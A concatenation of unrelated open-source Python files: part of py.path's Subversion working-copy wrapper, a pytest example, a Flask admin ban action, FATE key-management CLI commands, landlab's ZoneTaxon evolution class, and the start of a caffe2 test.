if (sys.platform != 'win32' and
_getsvnversion() == '1.3'):
url += "@HEAD"
else:
if _getsvnversion() == '1.3':
url += "@%d" % rev
else:
args.append('-r' + str(rev))
args.append(url)
self._authsvn('co', args)
def update(self, rev='HEAD', interactive=True):
""" update working copy item to given revision. (None -> HEAD). """
opts = ['-r', rev]
if not interactive:
opts.append("--non-interactive")
self._authsvn('up', opts)
def write(self, content, mode='w'):
""" write content into local filesystem wc. """
self.localpath.write(content, mode)
def dirpath(self, *args):
""" return the directory Path of the current Path. """
return self.__class__(self.localpath.dirpath(*args), auth=self.auth)
def _ensuredirs(self):
parent = self.dirpath()
if parent.check(dir=0):
parent._ensuredirs()
if self.check(dir=0):
self.mkdir()
return self
def ensure(self, *args, **kwargs):
""" ensure that an args-joined path exists (by default as
a file). if you specify a keyword argument 'directory=True'
then the path is forced to be a directory path.
"""
p = self.join(*args)
if p.check():
if p.check(versioned=False):
p.add()
return p
if kwargs.get('dir', 0):
return p._ensuredirs()
parent = p.dirpath()
parent._ensuredirs()
p.write("")
p.add()
return p
def mkdir(self, *args):
""" create & return the directory joined with args. """
if args:
return self.join(*args).mkdir()
else:
self._svn('mkdir')
return self
def add(self):
""" add ourself to svn """
self._svn('add')
def remove(self, rec=1, force=1):
""" remove a file or a directory tree. 'rec'ursive is
ignored and considered always true (because of
        underlying svn semantics).
"""
assert rec, "svn cannot remove non-recursively"
if not self.check(versioned=True):
# not added to svn (anymore?), just remove
py.path.local(self).remove()
return
flags = []
if force:
flags.append('--force')
self._svn('remove', *flags)
def copy(self, target):
""" copy path to target."""
py.process.cmdexec("svn copy %s %s" %(str(self), str(target)))
def rename(self, target):
""" rename this path to target. """
py.process.cmdexec("svn move --force %s %s" %(str(self), str(target)))
def lock(self):
""" set a lock (exclusive) on the resource """
out = self._authsvn('lock').strip()
if not out:
# warning or error, raise exception
raise ValueError("unknown error in svn lock command")
def unlock(self):
""" unset a previously set lock """
out = self._authsvn('unlock').strip()
if out.startswith('svn:'):
# warning or error, raise exception
raise Exception(out[4:])
def cleanup(self):
""" remove any locks from the resource """
# XXX should be fixed properly!!!
try:
self.unlock()
except:
pass
def status(self, updates=0, rec=0, externals=0):
""" return (collective) Status object for this file. """
# http://svnbook.red-bean.com/book.html#svn-ch-3-sect-4.3.1
# 2201 2192 jum test
# XXX
if externals:
raise ValueError("XXX cannot perform status() "
"on external items yet")
else:
#1.2 supports: externals = '--ignore-externals'
externals = ''
if rec:
rec= ''
else:
rec = '--non-recursive'
# XXX does not work on all subversion versions
#if not externals:
# externals = '--ignore-externals'
if updates:
updates = '-u'
else:
updates = ''
try:
cmd = 'status -v --xml --no-ignore %s %s %s' % (
updates, rec, externals)
out = self._authsvn(cmd)
except py.process.cmdexec.Error:
cmd = 'status -v --no-ignore %s %s %s' % (
updates, rec, externals)
out = self._authsvn(cmd)
rootstatus = WCStatus(self).fromstring(out, self)
else:
rootstatus = XMLWCStatus(self).fromstring(out, self)
return rootstatus
def diff(self, rev=None):
""" return a diff of the current path against revision rev (defaulting
to the last one).
"""
args = []
if rev is not None:
args.append("-r %d" % rev)
out = self._authsvn('diff', args)
return out
def blame(self):
""" return a list of tuples of three elements:
        (revision, committer, line)
"""
out = self._svn('blame')
result = []
blamelines = out.splitlines()
reallines = py.path.svnurl(self.url).readlines()
for i, (blameline, line) in enumerate(
zip(blamelines, reallines)):
m = rex_blame.match(blameline)
if not m:
raise ValueError("output line %r of svn blame does not match "
"expected format" % (line, ))
rev, name, _ = m.groups()
result.append((int(rev), name, line))
return result
_rex_commit = re.compile(r'.*Committed revision (\d+)\.$', re.DOTALL)
def commit(self, msg='', rec=1):
""" commit with support for non-recursive commits """
# XXX i guess escaping should be done better here?!?
cmd = 'commit -m "%s" --force-log' % (msg.replace('"', '\\"'),)
if not rec:
cmd += ' -N'
out = self._authsvn(cmd)
try:
del cache.info[self]
except KeyError:
pass
if out:
m = self._rex_commit.match(out)
return int(m.group(1))
def propset(self, name, value, *args):
""" set property name to value on this path. """
d = py.path.local.mkdtemp()
try:
p = d.join('value')
p.write(value)
self._svn('propset', name, '--file', str(p), *args)
finally:
d.remove()
def propget(self, name):
""" get property name on this path. """
res = self._svn('propget', name)
return res[:-1] # strip trailing newline
def propdel(self, name):
""" delete property name on this path. """
res = self._svn('propdel', name)
return res[:-1] # strip trailing newline
def proplist(self, rec=0):
""" return a mapping of property names to property values.
If rec is True, then return a dictionary mapping sub-paths to such mappings.
"""
if rec:
res = self._svn('proplist -R')
return make_recursive_propdict(self, res)
else:
res = self._svn('proplist')
lines = res.split('\n')
lines = [x.strip() for x in lines[1:]]
return PropListDict(self, lines)
def revert(self, rec=0):
""" revert the local changes of this path. if rec is True, do so
recursively. """
if rec:
result = self._svn('revert -R')
else:
result = self._svn('revert')
return result
def new(self, **kw):
""" create a modified version of this path. A 'rev' argument
indicates a new revision.
the following keyword arguments modify various path parts:
http://host.com/repo/path/file.ext
|-----------------------| dirname
|------| basename
|--| purebasename
|--| ext
"""
if kw:
localpath = self.localpath.new(**kw)
else:
localpath = self.localpath
return self.__class__(localpath, auth=self.auth)
def join(self, *args, **kwargs):
""" return a new Path (with the same revision) which is composed
of the self Path followed by 'args' path components.
"""
if not args:
return self
localpath = self.localpath.join(*args, **kwargs)
return self.__class__(localpath, auth=self.auth)
def info(self, usecache=1):
""" return an Info structure with svn-provided information. """
info = usecache and cache.info.get(self)
if not info:
try:
output = self._svn('info')
except py.process.cmdexec.Error:
e = sys.exc_info()[1]
if e.err.find('Path is not a working copy directory') != -1:
raise py.error.ENOENT(self, e.err)
elif e.err.find("is not under version control") != -1:
raise py.error.ENOENT(self, e.err)
raise
            # XXX SVN 1.3 writes its output to stderr instead of stdout (while
            # it does return 0!), which is a bit nasty; we assume nothing else
            # is written to stderr...
if (output.strip() == '' or
output.lower().find('not a versioned resource') != -1):
raise py.error.ENOENT(self, output)
info = InfoSvnWCCommand(output)
# Can't reliably compare on Windows without access to win32api
if sys.platform != 'win32':
if info.path != self.localpath:
raise py.error.ENOENT(self, "not a versioned resource:" +
" %s != %s" % (info.path, self.localpath))
cache.info[self] = info
return info
def listdir(self, fil=None, sort=None):
""" return a sequence of Paths.
listdir will return either a tuple or a list of paths
depending on implementation choices.
"""
if isinstance(fil, str):
fil = common.FNMatcher(fil)
# XXX unify argument naming with LocalPath.listdir
def notsvn(path):
return path.basename != '.svn'
paths = []
for localpath in self.localpath.listdir(notsvn):
p = self.__class__(localpath, auth=self.auth)
if notsvn(p) and (not fil or fil(p)):
paths.append(p)
self._sortlist(paths, sort)
return paths
def open(self, mode='r'):
""" return an opened file with the given mode. """
return open(self.strpath, mode)
def _getbyspec(self, spec):
return self.localpath._getbyspec(spec)
class Checkers(py.path.local.Checkers):
def __init__(self, path):
self.svnwcpath = path
self.path = path.localpath
def versioned(self):
try:
s = self.svnwcpath.info()
except (py.error.ENOENT, py.error.EEXIST):
return False
except py.process.cmdexec.Error:
e = sys.exc_info()[1]
if e.err.find('is not a working copy')!=-1:
return False
if e.err.lower().find('not a versioned resource') != -1:
return False
raise
else:
return True
def log(self, rev_start=None, rev_end=1, verbose=False):
""" return a list of LogEntry instances for this path.
rev_start is the starting revision (defaulting to the first one).
rev_end is the last revision (defaulting to HEAD).
if verbose is True, then the LogEntry instances also know which files changed.
"""
assert self.check() # make it simpler for the pipe
rev_start = rev_start is None and "HEAD" or rev_start
rev_end = rev_end is None and "HEAD" or rev_end
if rev_start == "HEAD" and rev_end == 1:
rev_opt = ""
else:
rev_opt = "-r %s:%s" % (rev_start, rev_end)
verbose_opt = verbose and "-v" or ""
locale_env = fixlocale()
# some blather on stderr
auth_opt = self._makeauthoptions()
#stdin, stdout, stderr = os.popen3(locale_env +
# 'svn log --xml %s %s %s "%s"' % (
# rev_opt, verbose_opt, auth_opt,
# self.strpath))
cmd = locale_env + 'svn log --xml %s %s %s "%s"' % (
rev_opt, verbose_opt, auth_opt, self.strpath)
popen = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
stdout, stderr = popen.communicate()
stdout = py.builtin._totext(stdout, sys.getdefaultencoding())
minidom,ExpatError = importxml()
try:
tree = minidom.parseString(stdout)
except ExpatError:
raise ValueError('no such revision')
result = []
for logentry in filter(None, tree.firstChild.childNodes):
if logentry.nodeType == logentry.ELEMENT_NODE:
result.append(LogEntry(logentry))
return result
def size(self):
""" Return the size of the file content of the Path. """
return self.info().size
def mtime(self):
""" Return the last modification time of the file. """
return self.info().mtime
def __hash__(self):
return hash((self.strpath, self.__class__, self.auth))
class WCStatus:
attrnames = ('modified','added', 'conflict', 'unchanged', 'external',
'deleted', 'prop_modified', 'unknown', 'update_available',
'incomplete', 'kindmismatch', 'ignored', 'locked', 'replaced'
)
def __init__(self, wcpath, rev=None, modrev=None, author=None):
self.wcpath = wcpath
self.rev = rev
self.modrev = modrev
self.author = author
for name in self.attrnames:
setattr(self, name, [])
def allpath(self, sort=True, **kw):
d = {}
for name in self.attrnames:
if name not in kw or kw[name]:
for path in getattr(self, name):
d[path] = 1
l = d.keys()
if sort:
l.sort()
return l
# XXX a bit scary to assume there's always 2 spaces between username and
# path, however with win32 allowing spaces in user names there doesn't
# seem to be a more solid approach :(
_rex_status = re.compile(r'\s+(\d+|-)\s+(\S+)\s+(.+?)\s{2,}(.*)')
def fromstring(data, rootwcpath, rev=None, modrev=None, author=None):
""" return a new WCStatus object from data 's'
"""
rootstatus = WCStatus(rootwcpath, rev, modrev, author)
update_rev = None
for line in data.split('\n'):
if not line.strip():
continue
#print "processing %r" % line
flags, rest = line[:8], line[8:]
# first column
c0,c1,c2,c3,c4,c5,x6,c7 = flags
#if '*' in line:
# print "flags", repr(flags), "rest", repr(rest)
if c0 in '?XI':
fn = line.split(None, 1)[1]
if c0 == '?':
wcpath = rootwcpath.join(fn, abs=1)
rootstatus.unknown.append(wcpath)
elif c0 == 'X':
wcpath = rootwcpath.__class__(
rootwcpath.localpath.join(fn, abs=1),
auth=rootwcpath.auth)
rootstatus.external.append(wcpath)
elif c0 == 'I':
wcpath = rootwcpath.join(fn, abs=1)
rootstatus.ignored.append(wcpath)
continue
#elif c0 in '~!' or c4 == 'S':
# raise NotImplementedError("received flag %r" % c0)
m = WCStatus._rex_status.match(rest)
if not m:
if c7 == '*':
fn = rest.strip()
wcpath = rootwcpath.join(fn, abs=1)
rootstatus.update_available.append(wcpath)
continue
if line.lower().find('against revision:')!=-1:
update_rev = int(rest.split(':')[1].strip())
continue
if line.lower().find('status on external') > -1:
# XXX not sure what to do here... perhaps we want to
# store some state instead of just continuing, as right
# now it makes the top-level external get added twice
# (once as external, once as 'normal' unchanged item)
# because of the way SVN presents external items
continue
# keep trying
raise ValueError("could not parse line %r" % line)
else:
rev, modrev, author, fn = m.groups()
wcpath = rootwcpath.join(fn, abs=1)
#assert wcpath.check()
if c0 == 'M':
assert wcpath.check(file=1), "didn't expect a directory with changed content here"
rootstatus.modified.append(wcpath)
elif c0 == 'A' or c3 == '+' :
rootstatus.added.append(wcpath)
elif c0 == 'D':
rootstatus.deleted.append(wcpath)
elif c0 == 'C':
rootstatus.conflict.append(wcpath)
elif c0 == '~':
rootstatus.kindmismatch.append(wcpath)
elif c0 == '!':
rootstatus.incomplete.append(wcpath)
elif c0 == 'R':
rootstatus.replaced.append(wcpath)
elif not c0.strip():
rootstatus.unchanged.append(wcpath)
else:
raise NotImplementedError("received flag %r" % c0)
if c1 == 'M':
rootstatus.prop_modified.append(wcpath)
# XXX do we cover all client versions here?
if c2 == 'L' or c5 == 'K':
rootstatus.locked.append(wcpath)
if c7 == '*':
rootstatus.update_available.append(wcpath)
if wcpath == rootwcpath:
rootstatus.rev = rev
rootstatus.modrev = modrev
rootstatus.author = author
if update_rev:
rootstatus.update_rev = update_rev
continue
return rootstatus
fromstring = staticmethod(fromstring)
class XMLWCStatus(WCStatus):
def fromstring(data, rootwcpath, rev=None, modrev=None, author=None):
""" parse 'data' (XML string as outputted by svn st) into a status obj
"""
# XXX for externals, the path is shown twice: once
# with external information, and once with full info as if
# the item was a normal non-external... the current way of
# dealing with this issue is by ignoring it - this does make
# externals appear as external items as well as 'normal',
# unchanged ones in the status object so this is far from ideal
rootstatus = WCStatus(rootwcpath, rev, modrev, author)
update_rev = None
minidom, ExpatError = importxml()
try:
doc = minidom.parseString(data)
except ExpatError:
e = sys.exc_info()[1]
raise ValueError(str(e))
urevels = doc.getElementsByTagName('against')
if urevels:
rootstatus.update_rev = urevels[-1].getAttribute('revision')
for entryel in doc.getElementsByTagName('entry'):
path = entryel.getAttribute('path')
statusel = entryel.getElementsByTagName('wc-status')[0]
itemstatus = statusel.getAttribute('item')
if itemstatus == 'unversioned':
wcpath = rootwcpath.join(path, abs=1)
rootstatus.unknown.append(wcpath)
continue
elif itemstatus == 'external':
wcpath = rootwcpath.__class__(
rootwcpath.localpath.join(path, abs=1),
auth=rootwcpath.auth)
rootstatus.external.append(wcpath)
continue
elif itemstatus == 'ignored':
wcpath = rootwcpath.join(path, abs=1)
rootstatus.ignored.append(wcpath)
continue
elif itemstatus == 'incomplete':
wcpath = rootwcpath.join(path, abs=1)
rootstatus.incomplete.append(wcpath)
continue
rev = statusel.getAttribute('revision')
if itemstatus == 'added' or itemstatus == 'none':
rev = '0'
modrev = '?'
author = '?'
date = ''
elif itemstatus == "replaced":
pass
else:
#print entryel.toxml()
commitel = entryel.getElementsByTagName('commit')[0]
if commitel:
modrev = commitel.getAttribute('revision')
author = ''
author_els = commitel.getElementsByTagName('author')
if author_els:
for c in author_els[0].childNodes:
author += c.nodeValue
date = ''
for c in commitel.getElementsByTagName('date')[0]\
.childNodes:
date += c.nodeValue
wcpath = rootwcpath.join(path, abs=1)
assert itemstatus != 'modified' or wcpath.check(file=1), (
                'didn\'t expect a directory with changed content here')
itemattrname = {
'normal': 'unchanged',
'unversioned': 'unknown',
'conflicted': 'conflict',
'none': 'added',
}.get(itemstatus, itemstatus)
attr = getattr(rootstatus, itemattrname)
attr.append(wcpath)
propsstatus = statusel.getAttribute('props')
if propsstatus not in ('none', 'normal'):
rootstatus.prop_modified.append(wcpath)
if wcpath == rootwcpath:
rootstatus.rev = rev
rootstatus.modrev = modrev
rootstatus.author = author
rootstatus.date = date
# handle repos-status element (remote info)
rstatusels = entryel.getElementsByTagName('repos-status')
if rstatusels:
rstatusel = rstatusels[0]
ritemstatus = rstatusel.getAttribute('item')
if ritemstatus in ('added', 'modified'):
rootstatus.update_available.append(wcpath)
lockels = entryel.getElementsByTagName('lock')
if len(lockels):
rootstatus.locked.append(wcpath)
return rootstatus
fromstring = staticmethod(fromstring)
class InfoSvnWCCommand:
def __init__(self, output):
# Path: test
# URL: http://codespeak.net/svn/std.path/trunk/dist/std.path/test
# Repository UUID: fd0d7bf2-dfb6-0310-8d31-b7ecfe96aada
# Revision: 2151
# Node Kind: directory
# Schedule: normal
# Last Changed Author: hpk
# Last Changed Rev: 2100
# Last Changed Date: 2003-10-27 20:43:14 +0100 (Mon, 27 Oct 2003)
# Properties Last Updated: 2003-11-03 14:47:48 +0100 (Mon, 03 Nov 2003)
d = {}
for line in output.split('\n'):
if not line.strip():
continue
key, value = line.split(':', 1)
key = key.lower().replace(' ', '')
value = value.strip()
d[key] = value
try:
self.url = d['url']
except KeyError:
raise ValueError("Not a versioned resource")
#raise ValueError, "Not a versioned resource %r" % path
self.kind = d['nodekind'] == 'directory' and 'dir' or d['nodekind']
try:
self.rev = int(d['revision'])
except KeyError:
self.rev = None
self.path = py.path.local(d['path'])
self.size = self.path.size()
if 'lastchangedrev' in d:
self.created_rev = int(d['lastchangedrev'])
if 'lastchangedauthor' in d:
self.last_author = d['lastchangedauthor']
if 'lastchangeddate' in d:
self.mtime = parse_wcinfotime(d['lastchangeddate'])
self.time = self.mtime * 1000000
def __eq__(self, other):
return self.__dict__ == other.__dict__
def parse_wcinfotime(timestr):
""" Returns seconds since epoch, UTC. """
# example: 2003-10-27 20:43:14 +0100 (Mon, 27 Oct 2003)
m = re.match(r'(\d+-\d+-\d+ \d+:\d+:\d+) ([+-]\d+) .*', timestr)
if not m:
raise ValueError("timestring %r does not match" % timestr)
timestr, timezone = m.groups()
# do not handle timezone specially, return value should be UTC
parsedtime = time.strptime(timestr, "%Y-%m-%d %H:%M:%S")
return calendar.timegm(parsedtime)
def make_recursive_propdict(wcroot,
output,
rex = re.compile("Properties on '(.*)':")):
""" Return a dictionary of path->PropListDict mappings. """
lines = [x for x in output.split('\n') if x]
pdict = {}
while lines:
line = lines.pop(0)
m = rex.match(line)
if not m:
raise ValueError("could not parse propget-line: %r" % line)
path = m.groups()[0]
wcpath = wcroot.join(path, abs=1)
propnames = []
while lines and lines[0].startswith(' '):
propname = lines.pop(0).strip()
propnames.append(propname)
assert propnames, "must have found properties!"
pdict[wcpath] = PropListDict(wcpath, propnames)
return pdict
def importxml(cache=[]):
if cache:
return cache
from xml.dom import minidom
from xml.parsers.expat import ExpatError
cache.extend([minidom, ExpatError])
return cache
class LogEntry:
def __init__(self, logentry):
self.rev = int(logentry.getAttribute('revision'))
for lpart in filter(None, logentry.childNodes):
if lpart.nodeType == lpart.ELEMENT_NODE:
if lpart.nodeName == 'author':
self.author = lpart.firstChild.nodeValue
elif lpart.nodeName == 'msg':
if lpart.firstChild:
self.msg = lpart.firstChild.nodeValue
else:
self.msg = ''
elif lpart.nodeName == 'date':
#2003-07-29T20:05:11.598637Z
timestr = lpart.firstChild.nodeValue
self.date = parse_apr_time(timestr)
elif lpart.nodeName == 'paths':
self.strpaths = []
for ppart in filter(None, lpart.childNodes):
if ppart.nodeType == ppart.ELEMENT_NODE:
self.strpaths.append(PathEntry(ppart))
def __repr__(self):
return '<Logentry rev=%d author=%s date=%s>' % (
self.rev, self.author, self.date)
# === File: /programming-language/cases/python/examples/py.test/example2_exception.py | repo: wdv4758h/notes | license: Unlicense ===
#!/usr/bin/env python
'''
you can use ``py.test -x`` to stop after the first failure,
or use ``py.test --maxfail=N`` to stop after N failures.
'''
import pytest
def f():
raise SystemExit(1)
def test_f_fail():
f()
def test_f_pass():
with pytest.raises(SystemExit):
f()
# === File: /actions/demo_ban_user.py | repo: vas3k/GodMode2 | license: WTFPL ===
from flask import render_template
from godmode.actions.base import BaseAction
from godmode.acl import ACL
class DemoBanUserAction(BaseAction):
name = "ban"
title = "Ban"
acl = ACL.ADMIN
stay_on_page = True
style = "white-space: nowrap;"
methods = ["GET", "POST"]
def do_item_action(self, *args, **kwargs):
user_id = kwargs.pop("id")
self.model.update(id=user_id, is_locked=True)
return render_template("success.html", message="User {} was banned".format(user_id))
# === File: /python/fate_client/flow_client/flow_cli/commands/key.py | repo: FederatedAI/FATE | license: Apache-2.0 ===
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import click
from flow_client.flow_cli.utils import cli_args
from flow_client.flow_cli.utils.cli_utils import preprocess, access_server
@click.group(short_help="Key Operations")
@click.pass_context
def key(ctx):
"""
\b
Provides a number of key operational commands, including save, query and delete.
For more details, please check out the help text.
"""
pass
@key.command("save", short_help="Save Public Key Command")
@cli_args.CONF_PATH
@click.pass_context
def save(ctx, **kwargs):
"""
- DESCRIPTION:
\b
save other site public key
\b
- USAGE:
flow key save -c fateflow/examples/key/save_public_key.json
"""
config_data, dsl_data = preprocess(**kwargs)
access_server('post', ctx, 'key/public/save', config_data)
@key.command("delete", short_help="Delete Public Key Command")
@cli_args.PARTYID_REQUIRED
@click.pass_context
def delete(ctx, **kwargs):
"""
- DESCRIPTION:
\b
delete other site public key
\b
- USAGE:
flow key delete -p 10000
"""
config_data, dsl_data = preprocess(**kwargs)
access_server('post', ctx, 'key/public/delete', config_data)
@key.command("query", short_help="Query Public Key Command")
@cli_args.PARTYID_REQUIRED
@click.pass_context
def query(ctx, **kwargs):
"""
- DESCRIPTION:
\b
query site public key
\b
- USAGE:
flow key query -p 10000
"""
config_data, dsl_data = preprocess(**kwargs)
access_server('post', ctx, 'key/query', config_data)
# === File: /landlab/components/species_evolution/zone_taxon.py | repo: landlab/landlab | license: MIT ===
#!/usr/bin/env python
"""ZoneTaxon object of SpeciesEvolver."""
import numpy as np
from pandas import Series
from .base_taxon import Taxon
class ZoneTaxon(Taxon):
"""A taxon based in zones.
A ``ZoneTaxon`` is composed of members of a lower taxonomic level that each
exists within a ``Zone`` object. Taxonomic rank is not considered by this
class despite the use of the term, 'speciation', which is used herein to
generally describe creation of a child taxon object.
All zones of the taxon can be obtained with the attribute ``zones``. Zones
are the objects that manage the geographic aspect of taxon member
populations. The total geographic extent of all populations is depicted by
the ``range_mask`` attribute. The zones of a ZoneTaxon instance are created
and updated using a ``ZoneController``. At model time steps, the
connectivity of zones over time is obtained using attributes of the
``Zone`` object.
The evolution of this taxon type is carried out in two stages during a
model time step. In the first stage, the zones of the taxon are updated
as the result of zone connectivity between the prior and current step in
the method, ``_update_zones``. This method is the primary implementation of
taxon dispersal and it is called in a stage prior to other evolutionary
processes so that all taxa are positioned in their landscape locations
prior to the other processes.
In the second stage, processes are carried out in methods that are readily
expanded or overridden when needed. The primary methods of second stage
macroevolution are ``_evaluate_dispersal``, ``_evaluate_speciation``, and
``_evaluate_extinction``. The evaluate dispersal method is intended to
modify dispersal conducted in the first stage and it has no effect unless
it is expanded or overridden to have an effect. Processes other than those
listed above can be called by expanding or overriding the ``_evolve``
method.
The taxon is allopatric when it is associated with/exists within multiple
zones (signifying multiple member populations). A timer is started when a
taxon becomes allopatric. Allopatric speciation occurs once the timer
reaches or exceeds the ``time_to_allopatric_speciation`` initialization
parameter. If the initialization parameter, ``persists_post_speciation``
is True (default), a child taxon is created in each zone except one zone
(the largest by area) that becomes the sole zone of the taxon. If
``persists_post_speciation`` is set to False, a child taxon is created in
each and every zone; the parent then occupies no zones and is therefore
no longer extant.
Extinction occurs when the taxon is no longer associated with any zones.
This occurs when zones in the prior time step do not overlap zones in the
current time step, signifying that the geographic range of the taxon no
longer exists. A taxon can also become non-extant when it speciates and
``persists_post_speciation`` is False, signifying that the parent taxon
has evolved into multiple taxa distinct from the original taxon.
The following columns will be added to the ``record_data_frame`` of the
SpeciesEvolver instance that tracks objects of this Taxon: 'speciations'
and 'extinctions', which are the counts of these variables at time steps.
Another column, 'pseudoextinctions' will be included when
``persists_post_speciation`` is False. This variable is the count of
occurrences when a parent taxon became non-extant due to speciation and not
because of an absence of zones.
"""
def __init__(
self,
zones,
parent=None,
time_to_allopatric_speciation=0,
persists_post_speciation=True,
):
"""Initialize a taxon.
Parameters
----------
zones : list of Zones
The initial SpeciesEvolver Zones where the taxon is located.
parent : Taxon, optional
A SpeciesEvolver taxon that is the parent taxon. The default value,
'None' indicates no parent.
time_to_allopatric_speciation : float, int, optional
The delay in model time to speciate following taxon geographic
fragmentation, indicated by multiple objects in the attribute,
``zones``. Speciation occurs at the time step when the delay is
reached or exceeded. The default value of 0 indicates speciation
occurs at the same time step as geographic fragmentation.
persists_post_speciation : boolean, optional
When 'True', the default, taxon persists despite speciation. When
'False' and following speciation, the taxon is no longer extant.
"""
super().__init__()
self.parent = parent
self._tas = time_to_allopatric_speciation
self._pps = persists_post_speciation
# Store zones that each represent an instance of a narrower taxonomic
# level, e.g. a population.
self._zones = zones
# Set taxon time in allopatry.
self._time_in_allopatry = None
self._update_allopatry_state()
@Taxon.extant.setter
def extant(self, state):
"""Set the living state of the taxon."""
self._extant = state
if not state:
# Ensure the taxon is not associated with zones when it is no
# longer extant.
self._zones = []
@property
def range_mask(self):
"""A mask representing the geographic extent of the taxon.
The mask is an array with a length of grid number of nodes. The taxon
exists at nodes where mask elements are ``True``. The mask of a
ZoneTaxon object is the union of all of its zone masks.
"""
masks = [zone.mask for zone in self.zones]
mask = np.any(masks, 0)
return mask
@property
def zones(self):
"""The zones of the taxon."""
return self._zones
def _evolve(self, dt, stage, record):
"""Run a step of evolutionary processes.
Dispersal resolved during stage 1 can be modified by extending or
overriding the dispersal evaluation method, as can speciation and
extinction that are also evaluated in this stage.
The attribute, ``extant`` is updated by this method.
Parameters
----------
dt : float
The model time step duration.
stage : int
The evolution stage of the time step.
record : defaultdict
The SpeciesEvolver record.
Returns
-------
boolean
Indicates if the taxon is still evolving. When `False` is returned,
this method will not be called for the taxon in subsequent stages in
the current model time step.
list of Taxon
The children produced by the taxon at a given stage. The ``evolve``
method of child taxon will be called in stages following the stage
the child taxon was produced. An empty list indicates no child
taxon.
"""
if stage == 0:
self._update_zones()
child_taxa = []
elif stage == 1:
# Evaluate macroevolutionary processes now that zones of all taxon
# objects were updated in stage 1.
self._evaluate_dispersal(dt)
self._update_allopatry_state(dt)
child_taxa = self._evaluate_speciation(dt)
child_count = len(child_taxa)
extinct = self._evaluate_extinction(dt)
pseudoextinct = child_count > 1 and not self._pps
self.extant = not extinct and not pseudoextinct
# Update the record.
record.increment_value("speciations", child_count)
record.increment_value("extinctions", int(extinct and not pseudoextinct))
if not self._pps:
record.increment_value("pseudoextinctions", int(pseudoextinct))
return stage < 1, child_taxa
def _update_zones(self):
"""Update the zones of the taxon.
Dispersal is represented by setting taxon zones to the zones of the
current time step that overlap the taxon zones of the prior time step
(`successors of a zone`).
"""
successors = []
for zone in self._zones:
successors.extend(zone.successors)
self._zones = Series(successors).drop_duplicates().tolist()
def _update_allopatry_state(self, dt=None):
"""Update taxon time in allopatry.
Parameter, ``dt`` can optionally be set to increment time in allopatry
given that the taxon is already allopatric.
Parameters
----------
dt : float, int, optional
The model time step duration.
"""
if len(self.zones) < 2:
self._time_in_allopatry = None
elif self._time_in_allopatry is None:
self._time_in_allopatry = 0
elif dt is not None:
self._time_in_allopatry += dt
def _produce_child_taxon(self, zones):
"""Get the taxon resulting from speciation.
This method returns a taxon of the same type as the object that
speciates. This child taxon is initialized with the initialization
parameter values of the parent object. At minimum in derived
implementations of this method, the parent taxon of the child should be
set to `self` to correctly construct the lineage.
Parameters
----------
zones : list of Zones
The zones where the child taxon will exist.
Returns
-------
Taxon
The child taxon.
"""
taxon_type = type(self)
child_taxon = taxon_type(
zones,
parent=self,
time_to_allopatric_speciation=self._tas,
persists_post_speciation=self._pps,
)
return child_taxon
def _evaluate_allopatric_speciation(self, dt):
"""Return child taxa if the taxon is allopatric.
A child taxon is returned for each zone except the largest zone if
``persists_post_speciation`` is True. A child taxon is returned for all
zones if ``persists_post_speciation`` is False. The ``zones`` attribute
is set to a list containing the largest zone or no zone when
``persists_post_speciation`` is True or False, respectively. This
method is called by the ``_evaluate_speciation`` method in the second
stage of taxon evolution.
Parameter ``dt`` is not used in the ZoneTaxon implementation of this
method. It is included to follow the pattern of including this
parameter in ZoneTaxon evolution methods.
Parameters
----------
dt : float, int
The model time step duration.
Returns
-------
list of taxon objects
The taxon objects produced by allopatric speciation. An empty list
indicates no child objects and no allopatric speciation.
"""
zones = self.zones
allopatric = self._time_in_allopatry is not None
children = []
if allopatric and self._time_in_allopatry >= self._tas:
if self._pps:
# The zone/member with the greatest zone area remains
# associated with the object.
idx = np.argmax([zone.area for zone in zones])
largest_zone = zones.pop(idx)
for zone in zones:
child = self._produce_child_taxon([zone])
children.append(child)
if self._pps:
self._zones = [largest_zone]
else:
self._zones = []
self._update_allopatry_state()
return children
def _evaluate_dispersal(self, dt):
"""Modify taxon dispersal.
Population dispersal is principally determined in stage 1 by the
method, ``_update_zones``. This evaluation method is called by the
taxon evolve method in stage 2 and allows modification of the stage 1
dispersal. This method implemented in ZoneTaxon does not modify stage 1
dispersal. It is intended to be overridden when needed.
Parameters
----------
dt : float, int
The model time step duration.
"""
# pragma: no cover
def _evaluate_speciation(self, dt):
"""Return child taxa if speciation occurs.
This method is called by the taxon stage 2 evolve method. The default
implementation of this method solely gets any taxon objects resulting
from the method, ``_evaluate_allopatric_speciation``. Other modes of
speciation, including sympatric, can be evaluated here by expanding this
``_evaluate_speciation`` method.
Parameters
----------
dt : float, int
The model time step duration.
Returns
-------
list of taxon objects
The taxon objects produced by allopatric speciation. An empty list
indicates no child objects and no allopatric speciation.
"""
child_taxa = self._evaluate_allopatric_speciation(dt)
return child_taxa
def _evaluate_extinction(self, dt):
"""Determine if extinction occurs.
Extinction occurs if no zone/member populations exist. Other conditions
of extinction can be included by expanding or overriding this method.
Parameters
----------
dt : float, int
The model time step duration.
Returns
-------
boolean
`True` indicates the taxon has become extinct. `False` indicates
the taxon persists.
"""
taxon_occupies_no_zones = len(self.zones) == 0
return taxon_occupies_no_zones
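# A minimal sketch (not part of landlab) of the extension pattern described in
# the docstrings above: subclassing ZoneTaxon and overriding
# ``_evaluate_extinction``. The ``minimum_area`` threshold is a hypothetical
# parameter introduced only for illustration.
class FragileZoneTaxon(ZoneTaxon):
    """ZoneTaxon that also goes extinct when its total zone area is small."""

    def __init__(self, zones, minimum_area=0.0, **kwargs):
        super().__init__(zones, **kwargs)
        self._minimum_area = minimum_area

    def _evaluate_extinction(self, dt):
        # Keep the base condition (no zones) and add an area threshold.
        base_extinct = super()._evaluate_extinction(dt)
        total_area = sum(zone.area for zone in self.zones)
        return base_extinct or total_area < self._minimum_area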
# === File: /pytorch/source/caffe2/python/operator_test/flatten_op_test.py | repo: ryfeus/lambda-packs | license: MIT ===
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from hypothesis import given
import numpy as np
from caffe2.python import core
import caffe2.python.hypothesis_test_util as hu
